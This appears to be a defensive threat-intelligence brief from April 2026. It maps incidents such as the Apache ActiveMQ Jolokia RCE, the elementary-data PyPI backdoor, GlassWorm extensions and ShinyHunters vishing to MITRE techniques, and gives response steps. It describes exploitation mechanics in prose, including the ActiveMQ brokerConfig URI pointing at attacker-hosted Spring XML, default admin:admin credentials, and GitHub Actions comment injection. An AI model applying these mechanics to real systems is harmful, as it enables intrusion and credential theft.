T1565.002 Data Manipulation, Transmitted Data. Behavioral basis: CVE-2026-32201 SharePoint spoofing enables an attacker to view and modify sensitive SharePoint content via improper input validation without requiring privilege escalation.
T1566.001 Phishing, Spearphishing Attachment. Behavioral basis: CVE-2009-0238 Excel legacy RCE exploits maliciously crafted document attachments to execute code on the recipient's system.
T1068 Exploitation for Privilege Escalation. Behavioral basis: CVE-2026-33825 Microsoft Defender EoP abuses the signature update process to escalate a local user to SYSTEM integrity level.
T1210 Exploitation of Remote Services. Behavioral basis: CVE-2026-33827 Windows TCP/IP unauthenticated RCE and CVE-2026-33826 Windows Active Directory authenticated RCE both present network-reachable exploitation surfaces. No confirmed active exploitation at report date.
D3FEND countermeasure: D3-SBV Software Binary Attestation for Defender update package verification. D3-PA Process Ancestry Analysis to detect SYSTEM shells spawned from MsMpEng.exe. D3-NTF Network Traffic Filtering to restrict inbound TCP/IP and LDAP attack surface.

ShinyHunters ADT and Medtronic:
T1566.004 Phishing, Spearphishing Voice. Behavioral basis: ShinyHunters compromised an ADT employee's Okta SSO account via voice phishing (vishing), social engineering the employee or helpdesk to provide or reset credentials.
T1078 Valid Accounts. Behavioral basis: after vishing, ShinyHunters used legitimately obtained Okta SSO credentials to access ADT's Salesforce instance without exploiting a technical vulnerability.
T1530 Data from Cloud Storage. Behavioral basis: ShinyHunters accessed and exfiltrated PII from ADT's Salesforce CRM instance using the compromised identity, targeting customer records at scale.
D3FEND countermeasure: D3-MFA Multi-Factor Authentication hardening to require phishing-resistant MFA for SSO access. D3-UA User Account Analysis to detect unusual Salesforce export or bulk data access patterns.

FIELD 22 | MITRE TACTICS

All inferred from behavioral basis. No registered source confirmed MITRE tactic mappings explicitly.

Initial Access: T1190, T1195.002, T1566.001, T1566.004, T1199
Execution: T1059.007, T1059.004
Persistence: T1505.003
Privilege Escalation: T1068
Defense Evasion: T1564.001, T1553.002
Credential Access: T1528, T1552.001, T1552.004
Discovery: [NOT CONFIRMED in registered sources for any incident]
Collection: T1530, T1565.002
Command and Control: T1071.001
Impact: [NOT CONFIRMED in registered sources for any incident]

FIELD 23 | CONFIDENCE SCORE

Overall report confidence score: 78 (weighted across all incidents)

Scoring applied per the registered source confidence framework: authoritative sources (CISA, NVD) base 90; elevated sources (CrowdStrike) base 75; standard sources (BleepingComputer, The Hacker News, SecurityWeek) base 55; supplemental non-registry sources add contextual depth but reduce confidence where they serve as the primary or sole basis for a finding. Single source claims below 40.





Incident

Score

Rationale

Apache ActiveMQ CVE-2026-34197

92

CISA KEV authoritative base 90, NVD record confirmed, BleepingComputer and The Hacker News corroboration plus 5. No conflicts.

CISA KEV Expansion (SimpleHelp, Samsung, D-Link)

90

CISA KEV authoritative base 90. SecurityWeek and The Hacker News corroboration plus 5. No conflicts.

Microsoft SharePoint CVE-2026-32201 and CVE-2009-0238

90

CISA KEV authoritative base 90. BleepingComputer and The Hacker News corroboration plus 5. Consistent across both source versions. No conflicts.

Microsoft Defender CVE-2026-33825

78

CrowdStrike elevated base 75. BleepingComputer corroboration plus 5. No exploitation claim conflict.

Microsoft TCP/IP CVE-2026-33827 and AD CVE-2026-33826

75

CrowdStrike elevated base 75. No additional registered source corroboration. No confirmed exploitation.

ShinyHunters ADT and Medtronic

70

BleepingComputer standard base 55. Victim self-disclosure corroboration plus 5. Have I Been Pwned independent confirmation plus 5. Medtronic scope still under investigation, minus 5.

GlassWorm OpenVSX Sleeper Wave

65

BleepingComputer and The Hacker News standard base 55. Multiple non-registry corroborating sources (Socket, VicOne, Koi, Aikido) plus 10 contextual weight. No T1 registered source confirmation, minus 5 adjustment applied.

elementary-data PyPI Backdoor

65

BleepingComputer standard base 55. StepSecurity non-registry corroboration plus 5. No T1 registered source confirmation. Artifact IOCs partially actionable.

Vercel and Context.AI OAuth Supply Chain

52

No T1 or T2 registered primary source. Self-disclosure via Vercel Knowledge Base plus 5 for victim-side confirmation. Trend Micro and OX Security non-registry base 35. Attribution unconfirmed, minus 10. BreachForums active listing corroborates data exfiltration claim plus 5.

FIELD 24 | RECORD STATUS

Active. Monitoring required across multiple deadline tracks.

Apache ActiveMQ CVE-2026-34197: Active. Federal patch deadline 30 April 2026, 48 hours from report publication. Over 6,400 internet exposed instances confirmed unpatched. Status will move to Resolved when CISA confirms agency compliance or when deadline passes.

CISA KEV Expansion (SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X): Active. Federal deadline 8 May 2026. D-Link DIR-823X is EOL with no patch forthcoming; decommission actions ongoing for affected organizations.

Microsoft SharePoint CVE-2026-32201 and CVE-2009-0238: Active. Federal deadline elapsed at report publication (28 April 2026). Over 1,300 internet exposed SharePoint servers confirmed still unpatched as of 21 April 2026. Continued active exploitation confirmed.

Microsoft Defender CVE-2026-33825: Active but mitigating. Patch auto-deployed via Defender platform update 4.18.26030.3011. Air-gapped environments require manual action.

GlassWorm OpenVSX Sleeper Wave: Active. Wave 2 ongoing. Six of 73 sleeper extensions confirmed activated and delivering malware. OpenVSX moderation response status not confirmed in registered sources.

elementary-data PyPI Backdoor: Partially resolved. Clean version 0.23.4 published. Malicious 0.23.3 remains in environments that have not yet updated or rotated credentials. Incident response actions ongoing for affected organizations.

ShinyHunters ADT and Medtronic: Active. ADT breach confirmed and disclosed. Medtronic investigation ongoing. BreachForums listing for ADT data remains active. Regulatory and legal proceedings anticipated.

Vercel and Context.AI OAuth Supply Chain: Active. BreachForums listing at $2 million active as of report date. Vercel customer environment variable exposure scope confirmed. OAuth trust chain risk unmitigated for organizations that have not audited third-party app authorizations.

FIELD 25 | CH1 EXECUTIVE OVERVIEW

Chapter 1: Executive Overview

Today's threat picture is dominated by compounding software supply chain risk across the developer ecosystem, concurrent critical vulnerability exploitation with imminent federal deadlines, and a confirmed data extortion campaign against two major US organizations. No single threat actor is responsible for the full picture; the risk this brief communicates is systemic across tooling, infrastructure, and identity layers simultaneously.

Intelligence Quality
Core findings for the Apache ActiveMQ, SharePoint, and CISA KEV expansion incidents are supported by authoritative government sources and carry confidence scores above 90. The GlassWorm, elementary-data, and Vercel incidents rely primarily on standard and non-registry sources and carry moderate confidence. ShinyHunters attribution is well corroborated by victim statements and independent breach notification services. MITRE mappings across all incidents are behaviorally inferred, not source-confirmed.

Incident 1: GlassWorm OpenVSX Sleeper Extensions (Severity: High)
The GlassWorm campaign has returned with a second wave of 73 cloned sleeper extensions on the OpenVSX marketplace. The extensions appear legitimate at installation and are later updated to deliver malware targeting developer credentials and cryptocurrency wallet data. At least six of the 73 have already been activated in live environments. Prior GlassWorm activity has compromised more than 433 components across GitHub, npm, VS Code, and OpenVSX since October 2025, using invisible Unicode character obfuscation and Solana blockchain-backed command and control to evade standard detection.
Risk decision: Escalate. Developer environments are active attack surfaces and infected extensions can propagate malicious code into production artifacts and downstream customer environments.

Incident 2: elementary-data PyPI Backdoor (Severity: High)
An attacker exploited a GitHub Actions script injection weakness to forge a signed release of the elementary-data data observability package, version 0.23.3, pushing an infostealer to both PyPI and GitHub Container Registry. The package has over 1.1 million monthly downloads and is deeply embedded in dbt-based analytics pipelines. Any environment that installed version 0.23.3 or deployed containers from that tag must be treated as potentially compromised, with cloud credentials, SSH keys, and database passwords considered exposed. A clean version 0.23.4 is now available.
Risk decision: Escalate. Immediate dependency audit and credential rotation required for any organization running dbt-native data stacks.

Incident 3: Apache ActiveMQ CVE-2026-34197 (Severity: Critical, 48-Hour Federal Deadline)
Apache ActiveMQ's Jolokia JMX management interface contains a code injection vulnerability allowing authenticated attackers to execute arbitrary operating system commands on the broker by supplying an attacker-controlled Spring XML configuration URI. CISA has added it to the Known Exploited Vulnerabilities catalog with a federal remediation deadline of 30 April 2026, two days from this report. Over 6,400 internet exposed instances remain unpatched. The flaw existed in the codebase for 13 years before its discovery.
Risk decision: Escalate immediately. Patch or remove Jolokia endpoint access before the April 30 deadline. Treat as Priority 1 for any organization running Apache ActiveMQ Classic.

Incident 4: CISA KEV Expansion: SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X (Severity: Critical, May 8 Deadline)
CISA added four CVEs to the KEV catalog on 24 April 2026 covering SimpleHelp remote support software (CVE-2024-57726, CVSS 9.9, and CVE-2024-57728), Samsung MagicINFO 9 Server (CVE-2024-7399, CVSS 8.8), and the end-of-life D-Link DIR-823X router (CVE-2025-29635, CVSS 7.5). All carry confirmed active exploitation. The D-Link device will not receive a patch; CISA requires organizations to discontinue use immediately.
Risk decision: Escalate. Patch SimpleHelp and Samsung MagicINFO 9 before May 8. Replace D-Link DIR-823X immediately with a supported device.

Incident 5: Microsoft SharePoint CVE-2026-32201 and Excel CVE-2009-0238 KEV (Severity: Critical, Federal Deadline Elapsed)
CISA confirmed active exploitation of SharePoint spoofing vulnerability CVE-2026-32201 and added it to the KEV catalog with an April 28 federal deadline that has elapsed at this report's publication. Over 1,300 internet exposed SharePoint servers remain unpatched. CVE-2009-0238, a legacy Microsoft Excel RCE carrying a CVSS of 9.3, was added to the same KEV batch. Successful SharePoint exploitation enables unauthorized viewing and modification of sensitive collaboration content without requiring privilege escalation.
Risk decision: Escalate. Any unpatched internet-facing SharePoint instance is actively targeted. Patch or take offline immediately.

Incident 6: ShinyHunters ADT and Medtronic Extortion (Severity: High for Affected Organizations and Peer Sectors)
ShinyHunters compromised ADT via voice phishing against an Okta SSO account, then used the resulting access to exfiltrate personal data on 5.5 million individuals from Salesforce. The group claims a separate theft of 9 million records from Medtronic; Medtronic has confirmed system access while the scope of personal data exposure remains under investigation. These incidents demonstrate that SSO platforms and CRM applications are now primary targets for large-scale PII extortion, requiring no exploit of a technical vulnerability.
Risk decision: Monitor and escalate for organizations with similar identity and SaaS footprints. Review Okta and Salesforce access controls. Conduct vishing awareness and helpdesk social engineering training immediately.

Incident 7: Vercel and Context.AI OAuth Supply Chain (Severity: High, Lower Confidence)
A Lumma Stealer infection at Context.AI led to OAuth token exfiltration, which the attacker used to access a Vercel employee's Google Workspace and enumerate customer environment variables. Stolen data is listed on BreachForums at $2 million. Confidence on this incident is lower than others in this brief due to reliance on non-registry primary sources.
Risk decision: Escalate for Vercel customers. Audit Google Workspace OAuth authorizations and rotate all non-sensitive environment variable secrets immediately.

Priority Order for Defenders Today:

  1. Apache ActiveMQ CVE-2026-34197: patch or restrict Jolokia access before 30 April 2026.

  2. Microsoft SharePoint CVE-2026-32201: patch or isolate internet-facing instances immediately, federal deadline has elapsed.

  3. CISA KEV Expansion: patch SimpleHelp and Samsung MagicINFO 9 before May 8; replace D-Link DIR-823X now.

  4. GlassWorm: freeze new extension installs; audit extension inventories in developer and CI environments.

  5. elementary-data: identify all 0.23.3 deployments and rotate all exposed credentials now.

  6. ShinyHunters: review Okta and Salesforce access controls; harden vishing defenses.

  7. Vercel and Context.AI: audit OAuth third-party app authorizations; rotate environment variable secrets.

FIELD 26 | CH2 THREAT EXPOSURE ANALYSIS

Chapter 2: Threat Exposure Analysis

GlassWorm: Multi-Ecosystem Supply Chain Compromise via Sleeper Extensions

What is happening: GlassWorm is an evolving malware campaign that has systematically targeted developer extension ecosystems since October 2025, beginning with VS Code Marketplace and expanding to OpenVSX, GitHub, and npm. The campaign's latest wave introduces 73 cloned sleeper extensions that install as apparently benign tools and receive later updates activating malicious payloads. At least six of these extensions have already been activated to deliver credential-stealing and cryptocurrency-wallet-targeting malware. Prior waves compromised over 433 components across multiple ecosystems by hijacking legitimate extensions and repository infrastructure, using invisible Unicode characters to hide malicious logic inside visible source code, and using Solana blockchain infrastructure as command and control to route attacker instructions through a channel that evades domain-based network detection.

Strategic risk context: Developer workstations and CI/CD infrastructure function as the upstream entry point into downstream customer environments and signed production artifacts. A single infected extension installed in a build agent can inject malicious code into multiple software products, propagating the compromise to downstream users without any of those users taking a direct action. Organizations without strict extension allow-listing and provenance verification face elevated risk that their own codebases, signing keys, and distribution channels could be co-opted into further supply chain attacks.

Severity and business impact: If GlassWorm gains persistent access to developer credentials and repositories, attackers can silently introduce backdoors into software that ships to customers, leading to large-scale incident response obligations, regulatory scrutiny, and remediation costs that extend well beyond the initial workstation compromise. Because this campaign targets developers rather than a specific industry vertical, the blast radius spans software vendors, SaaS providers, financial technology teams, and internal enterprise engineering organizations simultaneously.

Confidence: 65. BleepingComputer and The Hacker News reporting is consistent across multiple waves. Non-registry sources (Socket Security, VicOne, Koi Security, Aikido, OpenSourceMalware) provide corroborating technical detail on infrastructure traits, payload behaviors, and extension lists. No CISA advisory or T1 vendor research organization has published a formal analysis of GlassWorm within the reporting window.

elementary-data: PyPI and Docker Supply Chain Backdoor in a Data Observability Tool

What is happening: An attacker exploited a GitHub Actions script injection weakness to forge a signed release of the elementary-data package. The attack was triggered by posting a malicious comment on an open pull request, causing the CI workflow to execute attacker-controlled shell code, exfiltrate the GITHUB_TOKEN, and forge a signed commit and release tag for version 0.23.3. The release pipeline then built and pushed a malicious PyPI package and a corresponding multi-architecture Docker image with tags 0.23.3 and latest, embedding an infostealer targeting developer credentials, cloud API keys, SSH keys, and database passwords. A clean version 0.23.4 replaced the malicious build after discovery.

Strategic risk context: elementary-data is a dbt-native data observability tool with over 1.1 million monthly downloads used by data and analytics engineers running modern cloud-based data stacks. Compromising this package gives attackers direct access to CI/CD pipelines and data processing environments that handle sensitive cloud credentials and configuration files underpinning data integrity across analytics platforms. The use of a forged signed release means standard provenance checks would not have flagged the malicious version.

Severity and business impact: Any organization that installed elementary-data 0.23.3 or deployed containers built from the compromised image tags must treat those environments as potentially compromised. Cloud account takeover, data exfiltration, and pipeline integrity loss are all plausible downstream consequences. Even where immediate exploitation did not occur, incident response and credential rotation will impose significant operational disruption on affected data engineering teams.

Confidence: 65. BleepingComputer and StepSecurity (non-registry) describe consistent attack mechanics. The artifact IOCs (version strings and Docker tags) are directly actionable. No T1 registered source has independently confirmed this incident within the reporting window.

Apache ActiveMQ CVE-2026-34197: Pre-Auth-Adjacent RCE via Jolokia JMX Bridge

What is happening: Apache ActiveMQ Classic exposes a JMX-over-HTTP management interface via the Jolokia endpoint at /api/jolokia/ on the web console (default port 8161). The default Jolokia access policy permits unrestricted exec operations on all ActiveMQ MBeans, including BrokerService.addNetworkConnector. An attacker who can reach this endpoint and authenticate (default credentials admin:admin are widespread in unmanaged deployments) can supply a discovery URI containing a brokerConfig parameter pointing to an attacker-controlled URL. The ActiveMQ VM transport layer fetches that URL and instantiates it as a Spring ResourceXmlApplicationContext, processing all singleton bean definitions before any BrokerService validation occurs. This allows arbitrary OS command execution via Runtime.exec() embedded in Spring bean factory methods. The flaw existed in the ActiveMQ codebase for 13 years and was identified by a researcher using AI-assisted static analysis. Fixed in Apache ActiveMQ Classic 5.19.4 and 6.2.3.

Strategic risk context: Apache ActiveMQ is one of the most widely deployed open source message brokers globally, used in enterprise integration, microservices, and financial services transaction processing. Internet exposure of the management interface is a common misconfiguration. Over 6,400 instances remain unpatched and internet-accessible as of BleepingComputer reporting within the window. The CISA KEV listing with a 48-hour federal deadline signals active exploitation is confirmed and adversaries are actively scanning for and attempting to exploit vulnerable instances.

Severity and business impact: Full operating system command execution in the context of the ActiveMQ service account. In environments where the broker runs with elevated or administrative privileges, this translates directly to full system compromise. Downstream risk includes ransomware pre-staging, lateral movement to message queue consumers, and integrity compromise of business-critical transaction processing pipelines.

Confidence: 92. CISA KEV authoritative confirmation, NVD record confirmed, BleepingComputer and The Hacker News corroboration. No conflicts across sources.

CISA KEV Expansion: SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X

What is happening: CISA added four CVEs to the KEV catalog on 24 April 2026 covering three products. CVE-2024-57726 (CVSS 9.9) and CVE-2024-57728 in SimpleHelp remote support software represent a missing authorization flaw enabling unauthenticated server actions and a companion path traversal flaw. CVE-2024-7399 (CVSS 8.8) in Samsung MagicINFO 9 Server allows an unauthenticated attacker to write arbitrary files as SYSTEM via path traversal, enabling web shell deployment. CVE-2025-29635 (CVSS 7.5) in the D-Link DIR-823X is a command injection via POST to /goform/ on an end-of-life device that will receive no patch. CISA's language for the D-Link is unambiguous: discontinue use immediately.

Strategic risk context: SimpleHelp is widely deployed as a remote support and helpdesk access platform; exploitation enables persistent attacker access to every endpoint managed through that platform, making it an effective ransomware pre-staging vector. Samsung MagicINFO 9 is present in healthcare, retail, and critical infrastructure facilities where digital signage hardware is connected to internal networks. D-Link DIR-823X EOL devices are common in home office and SMB environments, particularly in regions where device refresh cycles are slow.

Confidence: 90. CISA KEV authoritative confirmation for all four CVEs. SecurityWeek and The Hacker News provide consistent corroborating reporting.

Microsoft April 2026 KEV Cluster: SharePoint Spoofing, Legacy Excel RCE, Defender EoP, TCP/IP and AD RCE

What is happening: Microsoft's April 14, 2026 Patch Tuesday addressed 167 vulnerabilities. CVE-2026-32201 (SharePoint Server spoofing, CVSS 6.5) was exploited as a zero day before the patch was released and has been added to the CISA KEV with an April 28 federal deadline. Over 1,300 internet exposed SharePoint servers remain unpatched as of reporting within the window. CVE-2009-0238 (Excel legacy RCE, CVSS 9.3) was added to the same KEV batch, reflecting continued active use of document-based attack chains. CVE-2026-33825 (Microsoft Defender EoP, CVSS 7.8) allows a local user to reach SYSTEM by abusing the Defender signature update process; the fix is auto-deployed in platform version 4.18.26030.3011 but requires manual action in air-gapped environments. CVE-2026-33827 (Windows TCP/IP RCE, CVSS 8.1) exploits a race condition for unauthenticated remote code execution at high attack complexity with no user interaction. CVE-2026-33826 (Windows Active Directory RCE, CVSS 8.0) requires authentication but carries low complexity with no user interaction. Neither TCP/IP nor AD RCE CVEs have confirmed active exploitation at report date.

Strategic risk context: SharePoint is the collaboration backbone for thousands of enterprises globally. Active exploitation of a spoofing vulnerability against over 1,300 exposed servers means attackers can exfiltrate and manipulate sensitive internal documents and workflows without triggering availability-based alerts. The re-addition of a 2009 Excel RCE to the KEV catalog is a persistent reminder that legacy document-based phishing chains remain operationally active and that attachment-based delivery of malicious Excel files continues to achieve exploitation in current environments.

Confidence: 90 for SharePoint CVE-2026-32201 and CVE-2009-0238 (CISA KEV authoritative). 78 for Defender CVE-2026-33825 (CrowdStrike elevated, BleepingComputer corroboration). 75 for TCP/IP and AD RCE CVEs (CrowdStrike elevated, no exploitation confirmed).

ShinyHunters: Extortion Campaign Against ADT and Medtronic

What is happening: ShinyHunters used voice phishing to compromise an ADT employee's Okta SSO account. Using those credentials, the group accessed ADT's Salesforce CRM instance and exfiltrated personal data on 5.5 million individuals including names, phone numbers, addresses, dates of birth, and the last four digits of SSNs or Tax IDs for a subset. Have I Been Pwned independently confirmed the dataset. Separately, ShinyHunters claimed theft of 9 million records from Medtronic. Medtronic confirmed that hackers accessed certain corporate IT systems but the scope of personal data exposure remains under investigation.

Strategic risk context: These incidents confirm that SSO platforms and SaaS CRM applications are now primary attack targets for mass PII extortion. The attack required no zero-day vulnerability and no novel exploit. A single successful vishing call against a helpdesk or employee sufficed to unlock access to millions of customer records. For organizations running Okta and Salesforce with large PII datasets, the attack pattern from the ADT breach is directly replicable against their environments today.

Severity and business impact: For ADT and Medtronic, the incidents carry immediate regulatory notification obligations, litigation exposure, and reputational damage. ADT's confirmed exposure of partial SSN and Tax ID data for a subset of 5.5 million individuals creates significant risk of downstream identity fraud for affected individuals. For peer organizations, the primary takeaway is not a new exploit to patch but a process failure to remediate: weak vishing defenses and insufficient MFA enforcement on SSO access to high-value SaaS platforms.

Confidence: 70. BleepingComputer reporting, corroborated by direct victim statements from ADT and Medtronic and independent Have I Been Pwned dataset confirmation. Medtronic data scope remains under investigation, contributing minor uncertainty.

Vercel and Context.AI OAuth Supply Chain

What is happening: A Lumma Stealer infection at Context.AI, a third-party AI productivity tool, led to OAuth token exfiltration from an employee machine. The attacker used the stolen OAuth token to access a Vercel employee's Google Workspace, to which Context.AI had been granted broad Google Drive read scope. From there, the attacker accessed Vercel internal systems and enumerated environment variables for a subset of customer projects. Vercel's non-sensitive environment variables were not encrypted at rest, enabling the attacker to retrieve secrets in plaintext. The dataset was listed for sale on BreachForums at $2 million.

Strategic risk context: This incident demonstrates how OAuth trust relationships between AI productivity tools and enterprise platforms create invisible lateral movement paths that bypass perimeter defenses entirely. The attack required no exploitation of a Vercel vulnerability; it exploited the delegated trust that Vercel's employee had granted to a third-party tool. As AI-adjacent productivity tools proliferate in enterprise environments, each OAuth integration represents a potential pivot point into corporate infrastructure.

Confidence: 52. Primary sources are non-registry (Trend Micro, OX Security, Vercel self-disclosure). Attribution is unconfirmed. Lumma Stealer identification is from Trend Micro only. BreachForums listing corroborates exfiltration but does not confirm actor identity.

FIELD 27 | CH3 OPERATIONAL RESPONSE

Chapter 3: Operational Response

GlassWorm: Immediate Response and Containment

Containment priorities:

  1. Freeze new extension installs: halt all new OpenVSX and VS Code extension installations in production-adjacent developer and CI/CD environments until extension inventories are audited against known GlassWorm-associated publishers and the 73 sleeper extension list published by Socket Security and The Hacker News.

  2. Audit existing extensions: export extension lists from all developer IDEs and CI build agents. Cross-reference against GlassWorm-associated publisher names and suspicious clone identifiers from non-registry research reports. Flag any extension from an unverified publisher installed in the last six months.

  3. Isolate compromised hosts: any developer workstation found running confirmed or suspected GlassWorm extensions should be isolated from the network, imaged for forensic preservation, and rebuilt from known-good baselines. Rotate all credentials, tokens, and SSH keys that were accessible on the host.

Security hardening actions:
Implement extension allow-listing for critical developer environments permitting only approved, internally vetted extensions. Enforce EDR policies on developer machines tuned to detect abnormal browser-based credential file access, wallet database reads, SOCKS proxy creation, and hidden remote access tool activity consistent with GlassWorm payload behavior as described in VicOne analysis.

Internal security coordination:
Notify application security, DevOps, and CI/CD platform owners. Require confirmation that extension inventories have been audited across all build tooling domains. Brief legal and compliance teams if internal artifact signing keys or distribution pipelines are found to have been accessed.

elementary-data PyPI Backdoor: Immediate Response and Containment

Containment priorities:

  1. Identify impacted workloads: search all dependency manifests, lock files, Dockerfiles, and CI job definitions for elementary-data==0.23.3 or image tags 0.23.3 and latest pulled during the exposure window. Any workload or pipeline that pulled from these identifiers must be treated as potentially compromised.

  2. Rotate all exposed secrets: immediately rotate cloud credentials, SSH keys, database passwords, and API tokens that were accessible to any elementary-data process or pipeline running version 0.23.3. Do not wait for forensic confirmation of exfiltration before rotating. Assume exposure.

  3. Rebuild from clean images: rebuild all affected containers and virtual machines from known-good images using elementary-data 0.23.4 or later. Verify package signatures and checksums from PyPI against the official project release provenance.

Security hardening actions:
Review all GitHub Actions workflows for script injection exposure via user-controlled input fields, including pull request titles, body text, and comments, and ensure those inputs are never interpolated directly into shell commands. Enforce least-privilege scoping and short-lived expiry for all CI tokens to minimize blast radius from any future GITHUB_TOKEN exfiltration.

Internal security coordination:
Engage data engineering and platform teams directly. Ensure they understand that a credential rotation and environment rebuild is required regardless of whether active exploitation has been confirmed in their specific environment. Coordinate with SecOps to monitor cloud API activity for anomalous access patterns from accounts whose credentials may have been in scope.

Apache ActiveMQ CVE-2026-34197: Isolation and Patch Prioritization (April 30 Deadline)

Containment priorities:

  1. Inventory all ActiveMQ instances: identify every Apache ActiveMQ Classic deployment running versions before 5.19.4 or between 6.0.0 and 6.2.3. Check activemq.xml for web console and Jolokia enablement.

  2. Block Jolokia externally: immediately apply firewall or ACL rules denying inbound connections to the Jolokia endpoint (/api/jolokia/) from all untrusted networks. If the Jolokia endpoint is not required for production operations, disable it entirely in activemq.xml.

  3. Restrict Jolokia MBean exec operations: in jolokia-access.xml, deny exec operations on org.apache.activemq type=Broker brokerName=* for all non-administrative principals. This is a compensating control only; patching remains mandatory.

  4. Patch before April 30: apply Apache ActiveMQ Classic 5.19.4 or 6.2.3 before the CISA KEV federal deadline. For private sector organizations: treat this as a Priority 1 patch with no exceptions.

Tactical actions (post-containment, within 72 hours):
Review broker logs for POST requests to /api/jolokia/exec/ containing addNetworkConnector or addConnector with external URI parameters. Check for outbound HTTP or HTTPS GET requests from the ActiveMQ JVM process (java.exe or activemq service PID) to external hosts, particularly fetching XML or configuration files. Rotate all ActiveMQ administrative credentials regardless of whether exploitation activity is confirmed in logs.

CISA KEV Expansion: SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X (May 8 Deadline)

Containment priorities:

  1. SimpleHelp: apply the latest vendor patch immediately. Restrict access to the SimpleHelp server administration interface by IP allowlist. Audit all session logs for unauthorized or anomalous administrative actions.

  2. Samsung MagicINFO 9: patch to the fixed version immediately. Audit all web-accessible file directories on the server for unexpected files with executable extensions (.jsp, .php, .aspx) indicative of web shell upload via CVE-2024-7399. Isolate from the corporate LAN until patching is complete where immediate remediation is not possible.

  3. D-Link DIR-823X: no patch will be released. Decommission and replace immediately. There is no compensating control that makes continued use of this device acceptable. CISA mandates discontinue use.

Microsoft KEV Cluster: SharePoint Patching, Defender Update Enforcement, Excel Policy

Containment priorities:

  1. SharePoint CVE-2026-32201: apply Microsoft's April 2026 Patch Tuesday update for SharePoint Server 2016, 2019, and Subscription Edition immediately. Federal deadline has elapsed. For instances that cannot be patched immediately, remove internet exposure via firewall rules or reverse proxy restriction until remediation is complete.

  2. Excel CVE-2009-0238: enforce email attachment policies blocking .xls and .xlsb file types from external senders. Ensure Protected View is enabled for all externally sourced Office documents. Confirm the April 2026 Patch Tuesday update has been applied on all Windows endpoints.

  3. Defender CVE-2026-33825: verify Defender Antimalware Platform version using Get-MpComputerStatus and confirming AMProductVersion is 4.18.26030.3011 or higher. Manually distribute to air-gapped or update-restricted environments that have not received automatic deployment.

  4. Windows TCP/IP CVE-2026-33827 and Active Directory CVE-2026-33826: apply April 2026 Patch Tuesday updates. No active exploitation confirmed at report date but the attack surface (unauthenticated network-reachable RCE for TCP/IP, low-complexity authenticated AD RCE) warrants prompt patching given adversary interest in these primitives.

ShinyHunters ADT and Medtronic: Identity Hardening Actions for Peer Organizations

Containment priorities (pattern-focused, for organizations with similar identity and SaaS profiles):

  1. Harden Okta SSO: enforce phishing-resistant MFA (FIDO2 or hardware token) for all users with access to CRM or data-intensive SaaS platforms. Remove SMS and voice call as MFA fallback options for high-privilege accounts.

  2. Restrict Salesforce and CRM access: review data export and bulk access permissions in Salesforce. Apply IP-based access restrictions and session policies requiring continuous identity verification for high-volume data operations.

  3. Enhance vishing defenses: update security awareness training and internal helpdesk verification protocols to include voice phishing and impersonation scenarios consistent with the ADT attack chain. Implement a callback verification process for any request to change SSO credentials, reset MFA, or grant new access.

Vercel and Context.AI: OAuth Audit and Secrets Rotation

Containment priorities:

  1. Audit Google Workspace OAuth authorizations: review all third-party app authorizations in Google Workspace Admin console. Revoke any authorization granted to Context.AI or to AI productivity tools with Google Drive, Gmail, or broader Workspace access scopes. Apply this review to all tools not on an approved application list.

  2. Rotate Vercel environment variables: for any project hosted on Vercel, rotate all secrets, API keys, database credentials, and cloud provider credentials stored as environment variables, particularly those not flagged as Sensitive in the Vercel dashboard, which were not encrypted at rest.

  3. Review Vercel deployment logs: examine API access logs for anomalous environment variable enumeration requests between February and April 2026.

Security hardening actions:
Move all production secrets to a dedicated secrets manager (HashiCorp Vault, AWS Secrets Manager, or equivalent) rather than platform-native environment variable storage. Enforce OAuth app allowlisting policies that prevent Workspace users from authorizing third-party applications without IT security review and approval.

FIELD 28 | CH3 INCIDENT TIMELINE

Chapter 3: Incident Timelines

GlassWorm OpenVSX Sleeper Wave:
October 2025: GlassWorm campaign begins targeting OpenVSX and VS Code Marketplace with initial waves of malicious extension activity.
Early 2026 (approximate): Prior GlassWorm waves accumulate compromises across more than 433 components spanning GitHub, npm, VS Code, and OpenVSX.
26 to 27 April 2026: Socket Security identifies 73 new cloned sleeper extensions on OpenVSX. At least six are confirmed activated and delivering malware. BleepingComputer and The Hacker News publish reporting within the 24-hour window.
28 April 2026 (report date): Wave 2 active. OpenVSX moderation response status not confirmed in registered sources.

elementary-data PyPI Backdoor:
Approximately 26 to 27 April 2026: Attacker posts malicious pull request comment triggering GitHub Actions script injection. GITHUB_TOKEN exfiltrated. Malicious version 0.23.3 forged, signed, and pushed to PyPI and GitHub Container Registry with Docker tags 0.23.3 and latest.
Shortly after discovery: Clean version 0.23.4 published to PyPI. Docker latest tag reverted to clean build.
27 to 28 April 2026: BleepingComputer and StepSecurity publish reporting within the window.
28 April 2026 (report date): Incident partially resolved at the package level. Credential rotation and environment rebuilds ongoing for affected organizations.

Apache ActiveMQ CVE-2026-34197:
6 April 2026: Horizon3.ai (non-registry) discloses CVE-2026-34197. NVD record created.
7 April 2026: Canadian Centre for Cyber Security issues advisory AV26-330.
8 April 2026: Researcher publishes account of using AI-assisted static analysis to discover the 13-year-old flaw.
Approximately 16 April 2026: CISA adds CVE-2026-34197 to the KEV catalog. Federal remediation deadline set for 30 April 2026.
28 April 2026 (report date): Over 6,400 internet exposed instances remain unpatched. Deadline T minus 48 hours.
30 April 2026: CISA KEV federal remediation deadline.

CISA KEV Expansion: SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X:
CVE assignment dates range from 2024 to 2025, reflecting original vulnerability discovery timelines across the three products. Active exploitation confirmed in CISA intelligence prior to KEV listing.
24 April 2026: CISA adds CVE-2024-57726, CVE-2024-57728, CVE-2024-7399, and CVE-2025-29635 to the KEV catalog. Federal remediation or discontinuation deadline set for 8 May 2026.
26 to 27 April 2026: cybersecurity-help.cz and SecurityWeek publish coverage.
28 April 2026 (report date): Deadline T minus 10 days.
8 May 2026: CISA KEV federal remediation deadline.

Microsoft April 2026 Patch Tuesday KEV Cluster:
14 April 2026: Microsoft releases April 2026 Patch Tuesday covering 167 CVEs. CVE-2026-32201 and CVE-2026-33825 included. CVE-2026-32201 was exploited as a zero day before this patch.
Approximately 21 April 2026: BleepingComputer reports over 1,300 unpatched internet exposed SharePoint servers remain under active attack.
Approximately 25 April 2026: CISA adds CVE-2026-32201 and CVE-2009-0238 to the KEV catalog. Federal deadline set for 28 April 2026.
